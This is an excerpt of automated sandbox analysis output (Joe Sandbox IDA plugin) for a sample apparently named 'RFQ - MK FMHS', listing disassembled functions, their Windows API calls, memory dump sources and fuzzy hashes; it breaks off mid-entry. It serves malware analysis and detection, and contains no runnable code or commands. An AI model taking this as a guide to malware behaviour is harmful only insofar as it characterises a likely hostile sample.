                      • Part of subcall function 00ECF5AD: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,00ECE1C4,?,?,?,00ECEFB7,00000000,000000EF,00000119,?,?), ref: 00ECF5BC
                      • Part of subcall function 00ECF5AD: lstrcpyW.KERNEL32(00000000,?), ref: 00ECF5E2
                      • Part of subcall function 00ECF5AD: lstrcmpiW.KERNEL32(00000000,?,00ECE1C4,?,?,?,00ECEFB7,00000000,000000EF,00000119,?,?), ref: 00ECF613
                    • lstrlenW.KERNEL32(?,00000002,?,?,?,?,00ECEFB7,00000000,000000EF,00000119,?,?,00000000), ref: 00ECE1DD
                    • lstrcpyW.KERNEL32(00000000,?), ref: 00ECE203
                    • lstrcmpiW.KERNEL32(00000002,cdecl,?,00ECEFB7,00000000,000000EF,00000119,?,?,00000000), ref: 00ECE237
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: lstrcmpilstrcpylstrlen
                    • String ID: cdecl
                    • API String ID: 4031866154-3896280584
                    • Opcode ID: 3760bc1cd6c3043dca8cd58e0a97f183e556e51002cf7f3ef2c84068fe4483cf
                    • Instruction ID: 91644fd818fba730444dac160a2afa4f513a8cb1637538fdbc3f8df09815e3c0
                    • Opcode Fuzzy Hash: 3760bc1cd6c3043dca8cd58e0a97f183e556e51002cf7f3ef2c84068fe4483cf
                    • Instruction Fuzzy Hash: 3711BE36200301EFCB29AF64D945F7A77A9FF84350B40602AF906DB260EB729852D7A0
                    Function 00EA5332 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • _free.LIBCMT ref: 00EA5351
                      • Part of subcall function 00E9594C: __FF_MSGBANNER.LIBCMT ref: 00E95963
                      • Part of subcall function 00E9594C: __NMSG_WRITE.LIBCMT ref: 00E9596A
                      • Part of subcall function 00E9594C: RtlAllocateHeap.NTDLL(014A0000,00000000,00000001,00000000,?,?,?,00E91013,?), ref: 00E9598F
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: AllocateHeap_free
                    • String ID:
                    • API String ID: 614378929-0
                    • Opcode ID: 8691bc0a69dd74b502e9288605ff2df4fd5eebba1dee114a3990749337b86584
                    • Instruction ID: 337e2544accc0a90beb4fedd72d7961bb8664d80515dfe2537dde9d8111a241c
                    • Opcode Fuzzy Hash: 8691bc0a69dd74b502e9288605ff2df4fd5eebba1dee114a3990749337b86584
                    • Instruction Fuzzy Hash: B4112333505A15AFCF312F70AC0066E37D89F9A3A4B10242AF944BE1A0DEB1A9448790
                    Function 00E74531 Relevance: 6.1, APIs: 4, Instructions: 66timewindowCOMMON
                    Download Yara Rule
                    APIs
                    • _memset.LIBCMT ref: 00E74560
                      • Part of subcall function 00E7410D: _memset.LIBCMT ref: 00E7418D
                      • Part of subcall function 00E7410D: _wcscpy.LIBCMT ref: 00E741E1
                      • Part of subcall function 00E7410D: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00E741F1
                    • KillTimer.USER32(?,00000001,?,?), ref: 00E745B5
                    • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00E745C4
                    • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00EAD6CE
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                    • String ID:
                    • API String ID: 1378193009-0
                    • Opcode ID: 7f60aebdc31c54f33f284934e4770531ff253c701d8ad8fc1df50262825c644d
                    • Instruction ID: 1780074d5415f6a2acb917b3103000da1cd7d1b844c5bdb3fa9dd1299542ca70
                    • Opcode Fuzzy Hash: 7f60aebdc31c54f33f284934e4770531ff253c701d8ad8fc1df50262825c644d
                    • Instruction Fuzzy Hash: 6A21FCB0508784AFEB329B24DC45BE7BFEC9F45308F04509EE69E7A181C7746A84DB51
                    Function 00EE667C Relevance: 6.1, APIs: 4, Instructions: 61networkCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00E75B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00ED7B20,?,?,00000000), ref: 00E75B8C
                      • Part of subcall function 00E75B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00ED7B20,?,?,00000000,?,?), ref: 00E75BB0
                    • gethostbyname.WSOCK32(?), ref: 00EE66AC
                    • WSAGetLastError.WSOCK32(00000000), ref: 00EE66B7
                    • _memmove.LIBCMT ref: 00EE66E4
                    • inet_ntoa.WSOCK32(?), ref: 00EE66EF
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                    • String ID:
                    • API String ID: 1504782959-0
                    • Opcode ID: 0303fad97039042827f74097aad0545cf3a9985c41e373d1c516b806e77e0a26
                    • Instruction ID: 9deeabf45fc551a76e666c7953e4fb3df0e9dc96f33d005f903dc2f944e54f0d
                    • Opcode Fuzzy Hash: 0303fad97039042827f74097aad0545cf3a9985c41e373d1c516b806e77e0a26
                    • Instruction Fuzzy Hash: 9B118E36900509AFCB04EBA1DD86DEEB7F8EF58310B049065F50AB7262DF70AE04CB61
                    Function 00EC9023 Relevance: 6.1, APIs: 4, Instructions: 59windowCOMMON
                    Download Yara Rule
                    APIs
                    • SendMessageW.USER32(?,000000B0,?,?), ref: 00EC9043
                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00EC9055
                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00EC906B
                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00EC9086
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: MessageSend
                    • String ID:
                    • API String ID: 3850602802-0
                    • Opcode ID: 3e269a167c33d709a64c6ae134723d070616f39ff1114c7af6c8365e1af00abe
                    • Instruction ID: 52a5a02fb82f12a5797edcb8fa21fd6a16721776abbb8dcbe1b8658bb3c4ed20
                    • Opcode Fuzzy Hash: 3e269a167c33d709a64c6ae134723d070616f39ff1114c7af6c8365e1af00abe
                    • Instruction Fuzzy Hash: 65114C79900218FFDB10DFA5C985FADBBB4FB48310F204095E904B7290D6726E11DB94
                    Function 00E71290 Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00E72612: GetWindowLongW.USER32(?,000000EB), ref: 00E72623
                    • DefDlgProcW.USER32(?,00000020,?), ref: 00E712D8
                    • GetClientRect.USER32(?,?), ref: 00EAB84B
                    • GetCursorPos.USER32(?), ref: 00EAB855
                    • ScreenToClient.USER32(?,?), ref: 00EAB860
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: Client$CursorLongProcRectScreenWindow
                    • String ID:
                    • API String ID: 4127811313-0
                    • Opcode ID: 2dc1c2ffefbe74a0de2966e4130eff57aeebe44bfad97bf170b6853459a31d47
                    • Instruction ID: 4a490ae2f993cd366a2e0a8bb42f429d662c0529e8e852a8fe77329bcabbf0b4
                    • Opcode Fuzzy Hash: 2dc1c2ffefbe74a0de2966e4130eff57aeebe44bfad97bf170b6853459a31d47
                    • Instruction Fuzzy Hash: C4111935900159AFCB00DF98D8859FE77B8EF45300F408496F905F7252CB30AA55EBA5
                    Function 00ED1652 Relevance: 6.1, APIs: 4, Instructions: 51sleepCOMMON
                    Download Yara Rule
                    APIs
                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00ED01FD,?,00ED1250,?,00008000), ref: 00ED166F
                    • Sleep.KERNEL32(00000000,?,?,?,?,?,?,00ED01FD,?,00ED1250,?,00008000), ref: 00ED1694
                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00ED01FD,?,00ED1250,?,00008000), ref: 00ED169E
                    • Sleep.KERNEL32(?,?,?,?,?,?,?,00ED01FD,?,00ED1250,?,00008000), ref: 00ED16D1
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: CounterPerformanceQuerySleep
                    • String ID:
                    • API String ID: 2875609808-0
                    • Opcode ID: c3f4d8bea01cf75f9dcb0b87a0b1f85050db9f3b65b00fb0c19446f07dccebc4
                    • Instruction ID: 7787cb41bfc8abcf4d1cc1ea3798e7168670c49fa9eb33abc197964a1bd2bcd3
                    • Opcode Fuzzy Hash: c3f4d8bea01cf75f9dcb0b87a0b1f85050db9f3b65b00fb0c19446f07dccebc4
                    • Instruction Fuzzy Hash: 6A113931C0152DEBCF009FE6D948AFEBB78FF49751F45509AEA50B6240CB3095A2CB96
                    Function 00EA7207 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                    • String ID:
                    • API String ID: 3016257755-0
                    • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                    • Instruction ID: b6136a95f5af23fce13b0d06fae1371f4983b149cda7ecbe25758cad142063ba
                    • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                    • Instruction Fuzzy Hash: 3E01807204414ABBCF129E84CC019EE3F66BF5E345F099515FA9868031D337E9B1AB91
                    Function 00EFB57F Relevance: 6.0, APIs: 4, Instructions: 47COMMON
                    Download Yara Rule
                    APIs
                    • GetWindowRect.USER32(?,?), ref: 00EFB59E
                    • ScreenToClient.USER32(?,?), ref: 00EFB5B6
                    • ScreenToClient.USER32(?,?), ref: 00EFB5DA
                    • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00EFB5F5
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: ClientRectScreen$InvalidateWindow
                    • String ID:
                    • API String ID: 357397906-0
                    • Opcode ID: 02d7ca1ac576cf99237dcbcaf3055109b60d61fd48a830689e58217d8d16703c
                    • Instruction ID: b19c38172bd36888543a3bc6f84a316730175087f2c69ae39602146f3663dfad
                    • Opcode Fuzzy Hash: 02d7ca1ac576cf99237dcbcaf3055109b60d61fd48a830689e58217d8d16703c
                    • Instruction Fuzzy Hash: 931134B9D00209EFDB41CF99C4849EEBBB5FF48310F504166E915E2220D735AA55CF91
                    Function 00EFB8EF Relevance: 6.0, APIs: 4, Instructions: 40processCOMMON
                    Download Yara Rule
                    APIs
                    • _memset.LIBCMT ref: 00EFB8FE
                    • _memset.LIBCMT ref: 00EFB90D
                    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00F37F20,00F37F64), ref: 00EFB93C
                    • CloseHandle.KERNEL32 ref: 00EFB94E
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: _memset$CloseCreateHandleProcess
                    • String ID:
                    • API String ID: 3277943733-0
                    • Opcode ID: 01e212e58b7872c9ccd7f0fe0ab97a4583fbcf390118b019a36fddf1e6f4c8e9
                    • Instruction ID: 83cf1456cf1aec3a6931ed2d78d6a75e202fc71439b4b5ae50c3f8b11118d16e
                    • Opcode Fuzzy Hash: 01e212e58b7872c9ccd7f0fe0ab97a4583fbcf390118b019a36fddf1e6f4c8e9
                    • Instruction Fuzzy Hash: 71F0DAF2544318BBE6203775AC05FBB7A9DEB09764F005021FA08E5192D7755910D7E8
                    Function 00ED6E7C Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                    Download Yara Rule
                    APIs
                    • EnterCriticalSection.KERNEL32(?), ref: 00ED6E88
                      • Part of subcall function 00ED794E: _memset.LIBCMT ref: 00ED7983
                    • _memmove.LIBCMT ref: 00ED6EAB
                    • _memset.LIBCMT ref: 00ED6EB8
                    • LeaveCriticalSection.KERNEL32(?), ref: 00ED6EC8
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: CriticalSection_memset$EnterLeave_memmove
                    • String ID:
                    • API String ID: 48991266-0
                    • Opcode ID: 400254ced4662adef490ad8933421cf7d5e96d76aa45d0d696cb5ba667e8e46e
                    • Instruction ID: 71a6749e3f7c9f614699f36f4ca1e224e4eca9ba85cffa5621ba1eb93d4e5310
                    • Opcode Fuzzy Hash: 400254ced4662adef490ad8933421cf7d5e96d76aa45d0d696cb5ba667e8e46e
                    • Instruction Fuzzy Hash: CEF0543A100200AFCF016F55DC85A99BB69EF85320B049065FE086E22AC731E951CBB4
                    Function 00EFC00C Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00E712F3: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00E7134D
                      • Part of subcall function 00E712F3: SelectObject.GDI32(?,00000000), ref: 00E7135C
                      • Part of subcall function 00E712F3: BeginPath.GDI32(?), ref: 00E71373
                      • Part of subcall function 00E712F3: SelectObject.GDI32(?,00000000), ref: 00E7139C
                    • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00EFC030
                    • LineTo.GDI32(00000000,?,?), ref: 00EFC03D
                    • EndPath.GDI32(00000000), ref: 00EFC04D
                    • StrokePath.GDI32(00000000), ref: 00EFC05B
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                    • String ID:
                    • API String ID: 1539411459-0
                    • Opcode ID: 067080e373d2dda4dd74a43ca16e2739d59c292570f22ec22b4bed89881c574e
                    • Instruction ID: 095ee8933b9f40b772688442ce9267ab39932069e925b0bf164f9cd0c220fc92
                    • Opcode Fuzzy Hash: 067080e373d2dda4dd74a43ca16e2739d59c292570f22ec22b4bed89881c574e
                    • Instruction Fuzzy Hash: 5DF0BE3100125DBBDB122F55AC09FEE3F99AF0A320F148000FB11710E28B750555EB99
                    Function 00ECA37C Relevance: 6.0, APIs: 4, Instructions: 30threadwindowtimeCOMMON
                    Download Yara Rule
                    APIs
                    • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00ECA399
                    • GetWindowThreadProcessId.USER32(?,00000000), ref: 00ECA3AC
                    • GetCurrentThreadId.KERNEL32 ref: 00ECA3B3
                    • AttachThreadInput.USER32(00000000), ref: 00ECA3BA
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                    • String ID:
                    • API String ID: 2710830443-0
                    • Opcode ID: b0dbd144709f24fdbfd173297f1b03fa27852bef429e98a94b8908804bd8c79d
                    • Instruction ID: dd050fefc485faeb8427f8ef12ad636959e578423c35f88b5a904dbf8f510812
                    • Opcode Fuzzy Hash: b0dbd144709f24fdbfd173297f1b03fa27852bef429e98a94b8908804bd8c79d
                    • Instruction Fuzzy Hash: 2AE01571541268BADB201FA2DD0CFEB3E1CEF167A5F048038F909E80A0CA72C955CBE0
                    Function 00E72218 Relevance: 6.0, APIs: 4, Instructions: 23COMMON
                    Download Yara Rule
                    APIs
                    • GetSysColor.USER32(00000008), ref: 00E72231
                    • SetTextColor.GDI32(?,000000FF), ref: 00E7223B
                    • SetBkMode.GDI32(?,00000001), ref: 00E72250
                    • GetStockObject.GDI32(00000005), ref: 00E72258
                    • GetWindowDC.USER32(?,00000000), ref: 00EAC0D3
                    • GetPixel.GDI32(00000000,00000000,00000000), ref: 00EAC0E0
                    • GetPixel.GDI32(00000000,?,00000000), ref: 00EAC0F9
                    • GetPixel.GDI32(00000000,00000000,?), ref: 00EAC112
                    • GetPixel.GDI32(00000000,?,?), ref: 00EAC132
                    • ReleaseDC.USER32(?,00000000), ref: 00EAC13D
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                    • String ID:
                    • API String ID: 1946975507-0
                    • Opcode ID: 3ee9f22eb5cda2ffed2c37619824c9145cdb074c69be8ab7b911775504d32b39
                    • Instruction ID: cdc4b5e56def674db474657b274982c9e370e0f31661e06d79e4ea5e20999832
                    • Opcode Fuzzy Hash: 3ee9f22eb5cda2ffed2c37619824c9145cdb074c69be8ab7b911775504d32b39
                    • Instruction Fuzzy Hash: 10E06D32200244EEDF215FB5FC4D7E83B24EF5633AF108366FA69680E287724994DB12
                    Function 00EC8C5A Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON
                    Download Yara Rule
                    APIs
                    • GetCurrentThread.KERNEL32 ref: 00EC8C63
                    • OpenThreadToken.ADVAPI32(00000000,?,?,?,00EC882E), ref: 00EC8C6A
                    • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00EC882E), ref: 00EC8C77
                    • OpenProcessToken.ADVAPI32(00000000,?,?,?,00EC882E), ref: 00EC8C7E
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: CurrentOpenProcessThreadToken
                    • String ID:
                    • API String ID: 3974789173-0
                    • Opcode ID: 36f1bf7b3b92d47138f8f1c91134d3b16e3ee0e54a39439820d23083064ed173
                    • Instruction ID: 17ed5b796be43e08cf8af2d09abe57323313c47e1d2d53e8d06973e80250d6bc
                    • Opcode Fuzzy Hash: 36f1bf7b3b92d47138f8f1c91134d3b16e3ee0e54a39439820d23083064ed173
                    • Instruction Fuzzy Hash: 68E04F366423119FD7205FB26F0CF667BA8AF90796F094838E245E9050DE35844ACB61
                    Function 00EB2187 Relevance: 6.0, APIs: 4, Instructions: 20COMMON
                    Download Yara Rule
                    APIs
                    • GetDesktopWindow.USER32 ref: 00EB2187
                    • GetDC.USER32(00000000), ref: 00EB2191
                    • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00EB21B1
                    • ReleaseDC.USER32(?), ref: 00EB21D2
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
